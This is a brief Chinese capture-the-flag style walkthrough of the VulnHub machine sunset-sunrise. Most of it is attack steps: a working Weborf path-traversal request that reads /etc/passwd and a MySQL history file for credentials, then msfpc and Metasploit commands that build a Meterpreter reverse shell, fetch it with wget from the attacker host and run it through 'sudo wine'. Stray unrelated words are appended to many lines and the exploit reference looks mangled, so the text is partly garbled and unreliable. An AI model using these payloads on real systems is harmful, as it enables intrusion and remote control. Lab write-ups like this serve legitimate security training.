靶機連接:python
https://www.vulnhub.com/entry/sunset-sunrise,406/mysql
主機掃描:web
端口掃描:sql
HTTP 80 目錄枚舉未果shell
HTTP 8080windows
Google search :Weborf/0.12.2 exploittcp
https://www.exploit-db.com/exploits/149253d
Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
code
成功讀取文件,而後咱們嘗試讀取一些敏感的目錄和文件,最後讀取MySQL的密碼:blog
http://10.10.203.22:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history
嘗試使用帳戶登陸系統
如何獲取用戶sunsire的權限,最後經過MySQL的用戶信息獲取到了密碼
接下來進行提權操做
這裏使用wine命令
控制端生成payload
msfpc windows 10.10.203.14
python -m SimpleHTTPServer 8888
use exploit/multi/handler
set encoder x86/shikata_ga_nai
set lhost 10.10.203.14
set lport 443
exploit -j
靶機上執行:
wget http://10.10.203.14:8888/windows-meterpreter-staged-reverse-tcp-443.exe
sudo wine windows-meterpreter-staged-reverse-tcp-443.exe
而後控制端就shell上線了
OVER!!!